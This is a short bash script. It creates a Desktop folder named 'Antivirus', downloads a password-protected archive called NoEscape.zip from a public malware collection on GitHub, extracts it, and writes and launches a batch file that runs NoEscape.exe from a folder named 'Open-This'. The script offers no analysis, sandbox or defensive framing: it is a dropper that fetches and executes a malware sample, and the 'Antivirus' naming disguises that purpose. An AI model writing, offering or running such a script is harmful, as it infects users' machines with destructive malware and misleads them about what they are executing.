#!/bin/bash

cd ~/Desktop
mkdir -p Antivirus
cd Antivirus
mkdir -p scripts
mkdir -p viruses
cd scripts
touch scripts.bat
echo "
START %UserProfile%\Desktop\Antivirus\viruses\Open-This\NoEscape.exe


" > scripts.bat
cd ..
cd viruses 
mkdir -p Open-This
cd Open-This
wget https://github.com/Endermanch/MalwareDatabase/raw/master/NoEscape.zip
unzip -P mysubsarethebest NoEscape.zip
rm -rf NoEscape.zip
cd ../..
cd scripts
scripts.bat
